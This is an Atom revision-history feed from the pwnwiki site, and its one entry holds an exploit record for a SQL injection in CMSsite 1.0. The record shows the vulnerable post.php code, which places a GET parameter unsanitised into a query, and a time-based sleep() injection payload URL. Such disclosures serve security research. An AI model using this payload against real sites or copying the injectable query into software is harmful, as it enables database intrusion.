<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CMSsite_1.0_-_%27post%27_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E</id>
	<title>CMSsite 1.0 - 'post' SQL注入漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CMSsite_1.0_-_%27post%27_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CMSsite_1.0_-_%27post%27_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-06T14:53:13Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CMSsite_1.0_-_%27post%27_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=2042&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: CMSsite 1.0 - 'post' SQL Injection  # Exploit Author: Mr Winst0n # Author E-mail: manamtabeshekan[@]gmail[.]com # Discovery Date: February 17, 2...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CMSsite_1.0_-_%27post%27_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=2042&amp;oldid=prev"/>
		<updated>2021-05-02T05:05:38Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: CMSsite 1.0 - &amp;#039;post&amp;#039; SQL Injection  # Exploit Author: Mr Winst0n # Author E-mail: manamtabeshekan[@]gmail[.]com # Discovery Date: February 17, 2...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: CMSsite 1.0 - 'post' SQL Injection&lt;br /&gt;
&lt;br /&gt;
# Exploit Author: Mr Winst0n&lt;br /&gt;
# Author E-mail: manamtabeshekan[@]gmail[.]com&lt;br /&gt;
# Discovery Date: February 17, 2019&lt;br /&gt;
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite&lt;br /&gt;
# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip&lt;br /&gt;
# Tested Version: 1.0&lt;br /&gt;
# Tested on: Kali linux, Windows 8.1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# PoC:&lt;br /&gt;
# Vulnerable File: post.php&lt;br /&gt;
# Vulnerable Parameter : post&lt;br /&gt;
&lt;br /&gt;
if (isset($_GET['post'])) {&lt;br /&gt;
	$post = $_GET['post'];&lt;br /&gt;
}&lt;br /&gt;
$query = &amp;quot;SELECT * FROM posts WHERE post_id=$post&amp;quot;;&lt;br /&gt;
$run_query = mysqli_query($con, $query);&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# Payload: http://localhost/CMSsite/post.php?post=1%20and%20(sleep(10))&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>